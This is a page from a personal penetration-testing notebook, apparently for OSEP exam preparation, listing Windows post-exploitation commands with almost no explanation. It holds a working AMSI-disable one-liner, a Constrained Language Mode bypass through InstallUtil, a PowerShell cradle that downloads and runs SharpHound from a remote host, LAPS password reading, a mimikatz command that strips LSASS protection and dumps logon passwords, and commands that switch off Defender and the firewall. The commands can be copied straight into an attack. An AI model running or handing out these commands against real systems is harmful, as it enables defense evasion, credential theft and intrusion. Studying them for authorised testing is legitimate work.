theAwful
  • Introduction
  • INTERNALS
    • Responder
      • NBNS/LLMNR
    • mitm6
    • Password Spraying
    • CME/NXC Cheatsheet
    • Kerberoasting
    • AS-REP Roasting
    • Dumping NTDS
  • Metasploit Payload and Listener
    • Encoder
    • Word Macros
    • Payloads
      • Earlybird
    • Metasploit Modules
  • OSEP Cheat Sheet
  • OSEP Challenges
    • Challenge 6
  • C2
    • Sliver
  • Privilege Escalation
    • PowerUp
    • Privilege Escalation
      • Internal Privilege Escalation (Linux)
  • Windows Local Recon
    • SQL Server
    • Application Whitelisting and Credentials
  • Linux Local Recon
  • File Transfer & Execution
  • Phishing
  • Ansible/Jfrog
  • Pivoting
  • Pass-the-hash
  • Remote Access
  • Post-Exploitation
    • Add User
    • AMSI, CLM, AppLocker
  • Credentials
  • Lateral Movement
  • Domain Enumeration
    • Users and Computers
    • ACLs
    • BloodHound
    • GPO
    • Trusts
    • User Hunting
  • Active Directory
    • Domain Recon - Kali
    • Domain Recon - Windows
    • Trusts
    • ADCS
      • ESC3
  • Web Application Testing
    • Host Headers
    • WAF Bypasses
    • Template Injection
    • Prototype Pollution
      • Client-side Prototype Pollution
    • Autorize
    • SQLmap
    • SSRF
    • File Uploads
    • Command Injection
    • XXE
      • Blind XXE
    • CSRF
    • XSS
      • XSS Methodology
      • Bypass WAF
  • MOBILE APPS
    • iOS
      • Install Tools
      • SSL Killswitch
    • Android
      • Install Tools
      • Setting up Burp
      • Red Teaming
  • Exploit Dev
    • AMSI Bypass
      • AMSI OpenSession
      • AMSI ScanBuffer
    • VBA Obfsu
    • APC Injection
    • EarlyBird Injection
  • DFIR
    • Malware Analysis
    • Memory Analysis
      • Volatility
    • Registry Analysis
      • RegRipper
    • Behavior Analysis
      • ShellBags
      • UserAssist
    • Filesystems
  • VISUAL STUDIO
    • Tricks
  • Scripts and Tools
    • Grep IPs from DNS ping
    • OSINT.sh
Powered by GitBook
On this page
  1. Windows Local Recon

Application Whitelisting and Credentials

CLM

  • Check CLM

$ExecutionContext.SessionState.LanguageMode

  • Bypass CLM

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U "C:\Windows\Tasks\clm.exe"

AMSI

  • Check AMSI

'amsiutils'

  • Disable AMSI

$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Failed") {$f=$e}};$f.SetValue($null,$true)

Enumerate Domain

iex (new-object net.webclient).downloadstring("http://192.168.x.y/tools/sharphound.ps1")
Invoke-BloodHound -CollectionMethod All -Verbose

SharpHound.exe -c All,GPOLocalGroup,LoggedOn --domain final.com --ldapusername nina --ldappassword 'PasswordRulon123!'

ipmo .\adpeas.ps1

Invoke-adPEAS

LAPS

  • Check LAPS

ipmo powerview.ps1

get-netcomputer -Filter "(ms-mcs-admpwdexpirationtime=*)" | select dnshostname

  • Read Password

ipmo powerview.ps1

get-netcomputer -Filter "(ms-mcs-admpwd=*)" | select dnshostname,ms-mcs-admpwd

AppLocker

  • Check AppLocker

Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe

  • Bypass AppLocker

PPL

  • Check PPL

Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"

  • Remove PPL

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "sekurlsa::logonpasswords"exit

Shutdown AV and Firewall

  • In PowerShell

Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true

netsh advfirewall set allprofiles state off

  • In RDP

Manually shut down WD.

PreviousSQL ServerNextLinux Local Recon

Last updated 1 year ago